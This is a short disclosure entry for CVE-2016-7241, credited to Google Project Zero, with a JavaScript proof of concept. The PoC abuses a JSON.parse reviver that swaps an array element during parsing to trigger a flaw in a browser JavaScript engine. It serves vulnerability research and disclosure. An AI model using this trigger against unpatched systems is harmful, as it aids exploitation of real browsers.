CVE-2016-7241

  • Report: Dec 2016
  • Fix: Oct 2016
  • Credit: Natalie Silvanovich, Google Project Zero

PoC

var once = false;
var a = 1;

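// Reviver callback for JSON.parse: invoked once per parsed value,
// with `this` bound to the object or array that holds that value.
function f(){
  if(!once){
    // First invocation only: swap element 2 of the holder for a newly
    // created array while JSON.parse is still walking the parsed structure.
    a = new Array(1, 2, 3);
    this[2] = a;
  }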
  once = true;
  return {};
}

JSON.parse("[1, 2, [4, 5]]", f);

Reference